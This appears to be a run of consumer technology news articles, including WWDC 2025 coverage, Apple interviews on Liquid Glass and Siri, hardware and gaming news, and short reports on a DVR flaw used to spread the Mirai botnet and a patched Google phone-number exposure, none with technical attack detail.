Apple's WWDC 2025 did not disappoint, but it didn't inspire either. I wanted answers to some of my burning questions, like when is Siri going to glow up, what's the future of Apple Home, and how will you inspire consumers to buy into the Vision Pro...er..vision?
None of that was forthcoming. Instead, we got a new, glossy design language (Liquid Glass), a ton of minutiae on iOS 26 feature updates (camera app overhaul, background on group messages, edge-to-edge Safari), more intelligent Apple Intelligence, and a much-needed iPadOS reinvention.
Apple spent 90 minutes telling us how the world of iPhones, Macs, Apple Watches, Apple TVs, and iPads would change, but unlike developers conference keynotes from Google or even Meta, they didn't tell us how they are changing the world. Apple's developers' conference was focused squarely on the platforms and how your experience with each of them would change.
No moment stood out as an "Oh, that's gonna change everything."
Not the star you expectedTo be clear, there are big changes. iPadOS 26 in particular might be unrecognizable (but in a good way) to people who've been using Apple's tablet for well over a decade. If you asked me 48 hours ago the biggest story to come out of the keynote, I would've guessed the new naming convention (years but not the one you're in!), Liquid Glass (like glass but much Apple-ly-er), or a surprise. iPadOS 26 was not on my bingo card.
Apple kept the keynote neatly focused on software, which I thought might bode well for a hardware surprise at the end.
I had visions of Apple AR glasses tease, the unveiling of a new, tethered, and much more affordable Vision Pro Lite.
I lieu of those fanciful "one more things," I hoped that maybe Apple software engineering lead Craig Federighi would circle back to the dismissive Siri mention at the beginning, preview the full-realized Apple Intelligence Siri and deliver a blood-oath promise that it would arrive at the same time as the first iOS 26 Public betas.
None of that happened. Apple dismissed its challenging year and presented a, to be far, exhaustive collection of platform updates. At least now we know why Siri is delayed.
To be certain, everything that was unveiled at WWDC 2025 is a lot, and I struggle to wrap my mind around it all. There are bits in there, for instance, like the macOS Tahoe Spotlight update, which won't reveal the true depth of its impact until we test-drive the new platforms.
On that note, I know you're tempted to download all the developer betas, but use caution. They're usually buggy and, in the case of the iPhone, most dev betas tend to suck the life right out of your battery (mainly because they're not yet optimized).
It's about certaintyThe larger issue here, though, is that, unlike previous years, where I knew Apple would deliver on its promises, I know that that's no longer a lock. I want to trust that the incredible Vision Pro personas update, the one that makes those floating heads look absolutely real, will arrive in the fall, that Spotlight with contextual awareness will work as demonstrated with the next new Mac, and the iPadOS 26's windowing and background activity prowess will be just as powerful as they looked during the keybote.
Even some of the stuff I'm reasonably certain will arrive will be limited. Digital IDs are expanding, but Apple is unable to get it working in all 50 US states (for now, nine support it), and watchOS 26's Workout Buddy, which relies on Apple Intelligence on the iPhone, will only support English, and what if it's only in the US?
There are now always limits to Apple's dream scenario, and I find that it's smart to wake up long before the first public beta drops.
Apple may surprise us and overdeliver, but if we've learned one thing from the WWDC 2025 keynote, it's that, for now, it's no longer in the business of big surprises that leave it in a position of underdelivering.
You might also likeColorful is reportedly set to release the Smart 900, a new high-end mini PC powered by AMD’s top-tier Ryzen AI MAX+ 395 processor.
Until now, Colorful’s AMD-based mini PC offerings have been limited to older processors, such as the Ryzen 7 7735HS used in the Smart 500A.
The Ryzen AI MAX+ 395 in the Smart 900 is AMD’s current flagship APU, combining 16 Zen 5 cores with Radeon 8060S graphics, built on 40 RDNA 3.5 Compute Units. This makes it one of the best integrated GPUs available for workloads, creative tasks, and gaming.
Memory and AI performanceThe system reportedly includes 96GB of LPDDR5X memory, which is lower than the 128GB maximum seen in some high-end PCs.
However, this figure may refer to a dedicated memory allocation for AI inference tasks, sometimes described as “VRAM” in translation.
Whether this is a hard cap or part of a split configuration remains unclear, but it highlights the system’s focus on AI and graphics-intensive use cases.
The Colorful Smart 900 has not yet been officially announced by the company, nor has it appeared on any of its social media channels, so we don't have too much more information, such as pricing.
It seems likely, however, that it will be positioned as a mini workstation for professionals working with large media projects.
As of now, only eleven brands have released products featuring Strix Halo. Notable models include the HP Z2 Mini G1a, Lenovo LCFC AI PC, and the GMKTec EVO-X2.
What remains puzzling is the complete silence from major brands like Dell, Asus, and MSI, who have yet to introduce any mini PCs using the chip.
These companies already offer high-performance, premium products that far exceed the price points of anything from Colorful or GMKTec, so pricing does not appear to be the limiting factor.
Their hesitation may instead stem from longer internal validation cycles, stricter thermal and reliability standards, or a delay in aligning with AMD's release schedule.
Another possibility is that these companies are prioritizing other AI hardware strategies, such as discrete GPUs or server-grade accelerators, over high-end APUs in compact desktops.
Via Videocardz
You might also likeIf you are using TBK DVR-4104, DVR-4216, or any digital video recording device that uses these instances as its basis, you might want to keep an eye on your hardware because it’s being actively hunted.
Cybersecurity researchers at Kaspersky claim to have seen a year-old vulnerability in these devices being abused to expand the dreaded Mirai botnet.
In April 2024, security researchers found a command injection flaw in the devices listed above. As per the NVD, the flaw is tracked as CVE-2024-3721, and was given a severity score of 6.3/10 (medium). It can be triggered remotely and grants the attackers full control over the vulnerable endpoint. Soon after discovery, the flaw also got a Proof-of-Concept (PoC) exploit.
Victims around the worldNow, a year later, Kaspersky says it saw this same PoC being used to expand the Mirai botnet. The attackers are using the bug to drop an ARM32 malware which assimilates the device and grants the owners the ability to run distributed denial of service (DDoS) attacks, proxy malicious traffic, and more.
The majority of victims Kaspersky is seeing are located in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. However as a Russian company, Kaspersky’s products are banned in many Western countries, so its analysis could be somewhat skewed.
The number of potentially vulnerable devices was more than 110,000 in 2024, and has since dropped to around 50,000. While most definitely an improvement, it still means that the attack surface is rather large.
Usually, when a vulnerability like this is discovered, a patch soon follows. However, multiple media sources are claiming that it is “unclear” if makers TBK Vision patched the bug.
CyberInsider reports that multiple third-party brands use these devices as a basis for their models, further complicating patch availability, and stating that “it’s very likely that for most, there is no patch.”
Some of the brands are Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, and others.
Via BleepingComputer
You might also likeLiquid Glass. It's an umbrella term for interface changes across virtually every Apple platform, but it's also evocative of an intangible thing; digital, transparent, amorphous glass that glides, flexes, and responds to touch in a way real glass could never do.
Just hours after Apple unveiled, at WWDC 2025, the biggest change to iOS since iOS 7 13 years ago, I, along with Tom's Guide Global Editor-in-Chief Mark Spoonauer, sat down with Apple's Senior Vice President of Software Engineering Craig Federighi and Apple Global VP of Marketing Greg Joswiak to talk about everything the company unveiled during its 90-minute keynote.
We talked about Siri, Apple Intelligence, and iPadOS's remarkable transformation, but it was when we asked about the inspiration for Liquid Glass that the pair became most animated.
Federighi first confirmed what rumors have been suggesting for months: that the toddler-aged visionOS, which runs on Apple's $3,500 mixed reality Vision Pro headset, was where it all started.
(Image credit: Lance Ulanoff / Future)"So I would say the most obvious inspiration is visionOS, which uses glass, and you say, 'Well, why did visionOS use glass? Well, glass is a material that allows interfaces to sit in the context, in this case, of a room, and feel like the chrome [or frame] – that is, the glass – is somehow consuming kind of less space. It's allowing more of the context to come through. That was very powerful in the concept of visionOS".
I found it hard to believe, though, that this still-new platform could be the full inspiration for Liquid Glass, a design approach that's set to appear in iOS 26, iPadOS 26, macOS Tahoe, tvOS 26, and watchOS 26. I asked Federighi if they looked at visionOS and the lightbulb went off, or if there were other, older influences. It turns out that Apple's obsession with glassy interfaces goes back at least a dozen years.
Through the looking glassImage 1 of 2(Image credit: Lance Ulanoff / Future)Image 2 of 2(Image credit: Lance Ulanoff / Future)"If you look back at even iOS, 7, we had started to work with translucent materials, and then you saw even in MacOS Yosemite, the sidebars and windows started to have this kind of translucency," he says. "So there was a glassness, already, that was finding its way as a building block material for interfaces."
Federighi also revealed the extent of real-world testing that went into developing the uncannily realistic look and responsiveness of Liquid Glass. "There [are these] designed rooms. You know, they bring [...] in different pieces of glass with different opacities, different lensing, it's quite interesting.".
He added that Apple has an industrial design studio which has the capability to fabricating almost anything. "There were certainly real material studies that were being done there."
The efforts to simulate real glass and its optical qualities were extensive, but then Liquid Glass also does things no real glass can do, like changing shape when you touch or move it. But it goes deeper than that.
"We found that because of the incredible diversity of content that you have on your device – you're scrolling through a feed and it's all white and then suddenly there's a dark sky image that comes and scrolls under the glass – but you want the glass to react in a way that a clear piece of light glass would.
Suddenly, the black thing comes in, and you can't read any of your text, or it looks poor. We were able to build adaptive glass that changes the way it's transmitting color that even can flip from a dark glass to a light glass adaptively, by understanding what's behind it. So, you know, it now becomes this incredibly malleable material that always fits in with whatever is beneath it."
Check back soon for a link to the TechRadar and Tom's Guide podcast featuring the full interview with Federighi and Joswiak.
You might also likeEpson has introduced a new way for users to access printing, through a subscription model that closely resembles how many people already pay for phones or streaming services.
The new ReadyPrint MAX plan offers customers an EcoTank printer along with regular ink deliveries, starting from as low as the equivalent of $7.99 per month for a 50-page plan.
The model eliminates the need for upfront costs, making it easier to start printing without a large initial purchase.
A constant supply of inkAfter selecting a printer that suits their needs, users choose a page plan based on how much they expect to print. The company sends the printer and keeps track of ink levels remotely, delivering new ink before it runs out.
ReadyPrint MAX is compatible with a range of Epson’s EcoTank printers. Models differ in features and price points, covering basic home printing up to higher-volume office use.
Options like the EcoTank ET-2870U and ET-M1170 focus on low-cost printing, while others like the ET-5850U and ET-16650U are aimed at users who need faster speeds, higher capacity, or A3 printouts.
Plans scale with use, offering monthly allowances from 50 to 3,000 pages. Users can change their plan each month if their needs shift, and once the 18-month commitment ends, subscriptions can continue on a monthly basis.
As you might expect, early cancellation fees apply if a user leaves before the minimum period is up, although Epson does offer a 14-day cancellation window at the start.
To keep everything running smoothly, the printer needs to stay connected to the internet, allowing firmware updates and ink tracking.
Ink is delivered proactively, so users don’t need to worry about ordering refills. If a customer chooses to end the plan, the printer must be returned in good condition to avoid a penalty.
ReadyPrint MAX reflects a shift toward service-based models, giving users flexibility in how they access and manage printing at home or in the office. It’s currently offered in select European countries, including the UK and Germany, and is expected to be launched in the USA, which already has ReadyPrint.
You might also likeThe race to put augmented reality smart glasses on your face is heating up. Snap Spectacles are transforming into "Specs" and will launch as lighter and more powerful AR wearables in 2026.
CEO Evan Spiegel announced the all-new Specs on stage at the XR event AWE, promising smart glasses that are smaller, considerably lighter, and "with a ton more capability."
The company didn't spell out a specific time frame or price, but the 2026 launch schedule does put Meta on notice, which is busy prepping its exciting Orion AR glasses for 2027. It appears, Snap Specs will face off with the Samsung/Google Android XR-based Glasses, which are also expected sometime in 2026.
As for what consumers can expect from Specs, Snap is building them on the same Snap OS used in its fifth-generation Spectacles (and likely still using a pair of Qualcomm Snapdragon XR chips). That means all the interface and interaction metaphors, like gesture-based controls, will remain. But there are a significant number of new features and integrations that will start showing up this year, long before Specs arrive, including AI.
Upgrading the platform(Image credit: Lance Ulanoff / Future)Spiegel explained the updates by first revealing that Snap started working on glasses "before Snapchat" was even a thing and that the company's overarching goal is "making computers more human." He added that "with advances in AI, computers are thinking and acting like humans more than ever before."
Snap's plan with these updates to Snap OS is to bring AI platforms into the real world. They're bringing Gemini and OpenAI models into Snap OS, which means that some multi-model AI capabilities will soon be part of Fifth Generation Spectacles and, eventually, Specs. These tools might be used for on-the-fly text translation and currency conversion.
The updated platform also adds tools for Snap Lenses builders that will integrate with the Spectacles' and Specs' AR waveform-based display capabilities.
A new Snap3D API, for instance, will let developers use GenAI to create 3D objects in lenses.
The updates will include a Depth Module AI, which can read 2D information to create 3D maps that will help anchor virtual objects in a 3D world.
Businesses deploying Spectables (and eventually Specs) may appreciate the new Fleet Management app, which will let developers manage and remotely monitor multiple Specs at once, and the ability to deploy the Specs for guided navigation at, say, a museum.
Later, Snap OS will add WebXR support to build AR and VR experiences within Web browsers.
Let's make it interestingSpiegel claimed that, through lenses in Snapchat, Snap has the largest AR platform in the world. "People use our AR lenses in our camera 8 billion times a day."
That is a lot, but it's virtually all through smartphones. At the moment, only developers are using the bulky Spectacles and their Lenses capabilities.
The consumer release of Specs could change that. When I tried Spectacles last year, I was impressed with the experience and found them, while not quite as good as Meta Orion glasses (the lack of gaze-tracking stood out for me), full of potential.
A lighter form factor that approaches or surpasses what I found with Orion and have seen in some Samsung Android XR glasses, could vault Snap Specs into the AR Glasses lead. That is, providing they do not cost $2000.
You might also likeDeveloper Round8 Studio has confirmed that Lies of P: Overture will receive additional difficulty changes based on player feedback.
In a new Director's Letter video following the shadow-drop release of the Overture downloadable content (DLC) at Summer Game Fest, director Jiwon Choi thanked players for their feedback and confirmed that the studio is looking to implement some changes that will mainly target combat and difficulty.
"We're reviewing all of it carefully and are already looking into when to implement some of your suggestions," Choi said. "Among all the feedback, we are paying the closest attention to the combat experience."
Players online have shared their thoughts on Overture, with some stating that the DLC feels more difficult than the base game, even when playing on the game's standard difficulty, Legendary Stalker.
"I’m at level 300 and should not be getting two-shot from basic enemies," one player wrote on Steam(via IGN). "It doesn’t help that the enemy grouping is designed for you to have to deal with multiple at once. This wouldn’t be a problem if even one of those enemies doesn’t take out half your health with one hit."
Choi continued, saying that the game will receive adjustments that will essentially nerf the difficulty.
"We identified areas that did not turn out quite as we intended. Therefore, we are reviewing various adjustments, including difficulty reduction.
"However, combat is one of the most fundamental experiences in Lies of P, so any modifications or changes require meticulous work and thorough testing."
We don't know when the patch will arrive, but we'll keep you updated.
In TechRadar Gaming's Lies of P: Overture review, Hardware Editor Rhys Wood said that DLC is an "expansion that exudes confidence on the part of developer Round8 Studio" and "successfully enriches the entire Lies of P package, with stunning and creative level design and some of the best boss fights in the subgenre as a whole".
You might also like...Google has fixed a flaw which was able to expose the phone number associated with any Google account, putting people at different privacy and security risks.
A security researcher with the alias ‘brutecat’ uncovered a way to bypass the anti-bot protection which prevented people from spamming password reset requests on Google accounts.
This allowed them to cycle through every possible combination until they were able to get the correct phone number. Later, they were able to automate the process, resulting in the phone number being guessed in roughly 20 minutes (depending on how many digits the number has).
Risks of exposed numbersThere are multiple privacy and security challenges that stem from an exposed phone number. For one, people who rely on anonymity (such as journalists, political opposition, dissidents, and similar) could be more vulnerable to targeted attacks. Also, exposing a person’s phone number opens them up to SIM-swap attacks, as well as phishing and social engineering. Finally, if an attacker successfully hijacks a phone number, they could reset passwords and gain unauthorized access to linked accounts.
Luckily enough, the issue has been fixed, and so far there have been no reports of the flaw being abused in the wild.
TechCrunch was one of the publications confirming the authenticity of the flaw, after setting up a dummy account with a brand new phone number, and having it “cracked” soon after.
“This issue has been fixed. We’ve always stressed the importance of working with the security research community through our vulnerability rewards program and we want to thank the researcher for flagging this issue,” Google spokesperson Kimberly Samra told TechCrunch.
“Researcher submissions like this are one of the many ways we’re able to quickly find and fix issues for the safety of our users.”
Samra said that the company has seen “no confirmed, direct links to exploits at this time.”
You might also likeThere's no denying that Apple's Siri digital chatbot didn't exactly hold a place of honor at this year's WWDC 2025 keynote. Apple mentioned it, and reiterated that it was taking longer than it had anticipated to bring everyone the Siri it promised a year ago, saying the full Apple Integration would arrive "in the coming year."
Apple has since confirmed this means 2026. That means we won't be seeing the kind of deep integration that would have let Siri use what it knew about you and your iOS-running iPhone to become a better digital companion in 2025. It won't, as part of the just-announced iOS 26, use app intents to understand what's happening on the screen and take action on your behalf based on that.
I have my theories about the reason for the delay, most of which revolve around the tension between delivering a rich AI experience and Apple's core principles regarding privacy. They often seem at cross purposes. This, though, is guesswork. Only Apple can tell us exactly what's going on – and now they have.
I, along with Tom's Guide Global Editor-in-Chief Mark Spoonauer, sat down shortly after the keynote with Apple's Senior Vice President of Software Engineering Craig Federighi and Apple Global VP of Marketing Greg Joswiak for a wide-ranging podcast discussion about virtually everything Apple unveiled during its 90-minute keynote.
We started by asking Federighi about what Apple delivered regarding Apple Intelligence, as well as the status of Siri, and what iPhone users might expect this year or next. Federighi was surprisingly transparent, offering a window into Apple's strategic thinking when it comes to Apple Intelligence, Siri, and AI.
Far from nothingLeft to right: Lance Ulanoff and Mark Spoonauer chat with Craig Federighi and Greg Josiwak (Image credit: Apple)(Image credit: Lance Ulanoff / Future)Federighi started by walking us through all that Apple has delivered with Apple Intelligence thus far, and, to be fair, it's a considerable amount
"We were very focused on creating a broad platform for really integrated personal experiences into the OS." recalled Federighi, referring to the original Apple Intelligence announcement at WWDC 2024.
At the time, Apple demonstrated Writing Tools, summarizations, notifications, movie memories, semantic search of the Photos library, and Clean Up for photos. It delivered on all those features, but even as Apple was building those tools, it recognized, Federighi told us, that "we could, on that foundation of large language models on device, private cloud compute as a foundation for even more intelligence, [and] semantic indexing on device to retrieve keep knowledge, build a better Siri."
Over-confidence?A year ago, Apple's confidence in its ability to build such a Siri led it to demonstrate a platform that could handle more conversational context, mispeaking, Type to Siri, and a significantly redesigned UI. Again, all things Apple delivered.
"We also talked about [...] things like being able to invoke a broader range of actions across your device by app intents being orchestrated by Siri to let it do more things," added Federighi. "We also talked about the ability to use personal knowledge from that semantic index so if you ask for things like, "What's that podcast, that 'Joz' sent me?' that we could find it, whether it was in your messages or in your email, and call it out, and then maybe even act on it using those app intents. That piece is the piece that we have not delivered, yet."
This is known history. Apple overpromised and underdelivered, failing to deliver a vaguely promised end-of-year Apple Intelligence Siri update in 2024 and admitting by spring 2025 that it would not be ready any time soon. As to why it happened, it's been, up to now, a bit of a mystery. Apple is not in the habit of demonstrating technology or products that it does not know for certain that it will be able to deliver on schedule.
Federighi, however, explained in some detail where things went awry, and how Apple progresses from here.
"We found that when we were developing this feature that we had, really, two phases, two versions of the ultimate architecture that we were going to create," he explained. "Version one we had working here at the time that we were getting close to the conference, and had, at the time, high confidence that we could deliver it. We thought by December, and if not, we figured by spring, until we announced it as part of WWDC. Because we knew the world wanted a really complete picture of, 'What's Apple thinking about the implications of Apple intelligence and where is it going?'"
A tale of two architectures(Image credit: Apple)As Apple was working on a V1 of the Siri architecture, it was also working on what Federighi called V2, "a deeper end-to-end architecture that we knew was ultimately what we wanted to create, to get to a full set of capabilities that we wanted for Siri."
What everyone saw during WWDC 2024 were videos of that V1 architecture, and that was the foundation for work that began in earnest after the WWDC 2024 reveal, in preparation for the full Apple Intelligence Siri launch.
"We set about for months, making it work better and better across more app intents, better and better for doing search," Federighi added. "But fundamentally, we found that the limitations of the V1 architecture weren't getting us to the quality level that we knew our customers needed and expected. We realized that V1 architecture, you know, we could push and push and push and put in more time, but if we tried to push that out in the state it was going to be in, it would not meet our customer expectations or Apple standards, and that we had to move to the V2 architecture.
"As soon as we realized that, and that was during the spring, we let the world know that we weren't going to be able to put that out, and we were going to keep working on really shifting to the new architecture and releasing something."
We realized that […] If we tried to push that out in the state it was going to be in, it would not meet our customer expectations or Apple standards, and that we had to move to the V2 architecture.
Craig Federighi, Apple
That switch, though, and what Apple learned along the way, meant that Apple would not make the same mistake again, and promise a new Siri for a date that it could not guarantee to hit. Instead. Apple won't "precommunicate a date," explained Federighi, "until we have in-house, the V2 architecture delivering not just in a form that we can demonstrate for you all…"
He then joked that, while, actually, he "could" demonstrate a working V2 model, he was not going to do it. Then he added, more seriously, "We have, you know, the V2 architecture, of course, working in-house, but we're not yet to the point where it's delivering at the quality level that I think makes it a great Apple feature, and so we're not announcing the date for when that's happening. We will announce the date when we're ready to seed it, and you're all ready to be able to experience it."
I asked Federighi if, by V2 architecture, he was talking about a wholesale rebuilding of Siri, but Federighi disabused me of that notion.
"I should say the V2 architecture is not, it wasn't a star-over. The V1 architecture was sort of half of the V2 architecture, and now we extend it across, sort of make it a pure architecture that extends across the entire Siri experience. So we've been very much building up upon what we have been building for V1, but now extending it more completely, and that more homogeneous end-to-end architecture gives us much higher quality and much better capability. And so that's what we're building now."
A different AI strategy(Image credit: Apple)Some might view Apple's failure to deliver the full Siri on its original schedule as a strategic stumble. But Apple's approach to AI and product is also utterly different than that of OpenAI or Google Gemini. It does not revolve around a singular product or a powerful chatbot. Siri is not necessarily the centerpiece we all imagined.
Federighi doesn't dispute that "AI is this transformational technology […] All that's growing out of this architecture is going to have decades-long impact across the industry and the economy, and much like the internet, much like mobility, and it's going to touch Apple's products and it's going to touch experiences that are well outside of Apple products."
Apple clearly wants to be part of this revolution, but on its terms and in ways that most benefit its users while, of course, protecting their privacy. Siri, though, was never the end game, as Federighi explained.
AI is this transformational technology [...] and it's going to touch Apple's products and it's going to touch experiences that are well outside of Apple products."
Craig Federighi, Apple
"When we started with Apple Intelligence, we were very clear: this wasn't about just building a chatbot. So, seemingly, when some of these Siri capabilities I mentioned didn't show up, people were like, 'What happened, Apple? I thought you were going to give us your chatbot. That was never the goal, and it remains not our primary goal."
So what is the goal? I think it may be fairly obvious from the WWDC 2025 keynote. Apple is intent on integrating Apple Intelligence across all its platforms. Instead of heading over to a singular app like ChatGPT for your AI needs, Apple's putting it, in a way, everywhere. It's done, Federighi explains, "in a way that meets you where you are, not that you're going off to some chat experience in order to get things done."
Apple understands the allure of conversational bots. "I know a lot of people find it to be a really powerful way to gather their thoughts, brainstorm [...] So, sure, these are great things," Federighi says. "Are they the most important thing for Apple to develop? Well, time will tell where we go there, but that's not the main thing we set out to do at this time."
Check back soon for a link to the TechRadar and Tom's Guide podcast featuring the full interview with Federighi and Joswiak.
Microsoft is bringing a handful of changes to its Windows 11 operating system in preparation for the ROG Xbox Ally handhelds. Beta testers are already starting to see improvements to the user interface – and one feature may be a significant aid to navigation.
As reported by The Verge, Microsoft is improving its Windows 11 Start menu, now available for testers, with more customization options to make scrolling and finding applications easier. These can be sorted into separate categories (as evident in the image below) or used in the classic grid view.
While all applications have always been accessible via the Start menu, this improved version makes finding your application much easier. Instead of finding a specific app through its first letter or symbol, you'll simply be able to jump into a 'Games' folder or 'Browsers' folder, eliminating the need to enable desktop icons.
The 'recommended' section can also be disabled, as this would often display recently-opened files or folders to make room for more apps, and now new categories. It's also worth noting that Microsoft states that the Start menu will be bigger, which will vary depending on the screen size or device being used.
These line up perfectly for the new login screen that allows users to enter their PIN using a game controller – and this is likely a preparation for the "full-screen experience" update coming for the new Windows 11 handhelds. However, there's one big benefit that OLED monitor users like me will appreciate, too.
Analysis: Some of my OLED burn-in worries can rest...(Image credit: Microsoft)I'll be honest, in all the years I've used Dell's Alienware AW3423DWF OLED monitor, I haven't come across a single issue with burn-in – and that's including moments of complacency, leaving static images on screen. Even so, I'm still paranoid it will happen eventually, and Microsoft's efforts for a better Start menu give me a slight sigh of relief.
Burn-in is one of the biggest dealbreakers for gamers contemplating an OLED purchase, and it's why I would go as far as to recommend a mini-LED monitor in some cases. However, OLED care on monitors is continuously advancing, and while Microsoft may have had other intentions with this tester update, it's worked as a bonus.
While Microsoft is doing this with its OS, I'd love to see the same concept applied to games. Early access or multiplayer games often have a build number in the corner of the screen, and fellow OLED users will be aware of how much of a nightmare this is, as it's essentially an open invitation for burn-in.
Regardless, it's a positive move from Microsoft in the same week that it announced an improved Xbox app. We'll just have to see if it's enough to create strong competition for SteamOS in terms of usability.
You may also like...